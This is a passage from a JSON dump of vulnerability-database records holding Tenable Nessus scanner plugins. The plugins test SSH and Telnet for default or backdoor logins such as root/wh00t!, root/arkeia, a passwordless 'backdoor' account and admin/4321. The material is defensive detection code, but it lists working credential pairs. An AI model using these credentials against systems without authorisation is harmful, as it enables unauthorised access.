'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:27", "description": "The account 'root' has the password 'wh00t!'. An attacker may use this to gain further privileges on this system. This account suggests that the Wh00t Rootkit may be present on the system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (wh00t!) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ROOTKIT2.NASL", "href": "https://www.tenable.com/plugins/nessus/11264", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"wh00t!\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11264);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (wh00t!) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' has the password 'wh00t!'. An attacker may use\nthis to gain further privileges on this system. This account suggests\nthat the Wh00t Rootkit may be present on the system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:06:58", "description": "The account 'root' on the remote host has the default password 'zlxx.'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'zlxx.' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ZLXX.NASL", "href": "https://www.tenable.com/plugins/nessus/94402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"zlxx.\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94402);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'zlxx.' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'zlxx.'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:04:22", "description": "The account 'root' on the remote host has the password 'arkeia'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.\n\nNote that Western Digital Arkeia is known to use these credentials to provide complete, administrative access to the virtual appliance.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-05-28T00:00:00", "type": "nessus", "title": "Default Password (arkeia) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ARKEIA.NASL", "href": "https://www.tenable.com/plugins/nessus/74217", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"arkeia\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74217);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (arkeia) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'arkeia'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\n\nNote that Western Digital Arkeia is known to use these credentials to\nprovide complete, administrative access to the virtual appliance.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:40:58", "description": "The account 'root' on the remote host has the password 'gforge'. An attacker may leverage this issue to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-10-15T00:00:00", "type": "nessus", "title": "Default Password (gforge) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_GFORGE.NASL", "href": "https://www.tenable.com/plugins/nessus/34417", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"gforge\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34417);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (gforge) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'gforge'. An \nattacker may leverage this issue to gain total control of the affected \nsystem.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:04:03", "description": "The account 'root' on the remote host has the default password 'adminIWSS85'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-07T00:00:00", "type": "nessus", "title": "Default Password 'adminIWSS85' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ADMINIWSS85.NASL", "href": "https://www.tenable.com/plugins/nessus/99247", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"adminIWSS85\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99247);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'adminIWSS85' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'adminIWSS85'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:30", "description": "The account 'backdoor' has no password set. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'backdoor' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_BACKDOOR.NASL", "href": "https://www.tenable.com/plugins/nessus/11250", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11250);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'backdoor' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host can be accessed with a blank password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'backdoor' has no password set. An attacker may use it to gain \nfurther privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:25", "description": "The account 'admin' on the remote host has the default password '4321'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '4321' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_4321.NASL", "href": "https://www.tenable.com/plugins/nessus/94365", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"4321\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94365);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '4321' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'4321'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:06", "description": "The account '666666' on the remote host has the default password '666666'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '666666' for '666666' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_666666_666666.NASL", "href": "https://www.tenable.com/plugins/nessus/94356", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"666666\";\npassword = \"666666\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94356);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '666666' for '666666' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account '666666' on the remote host has 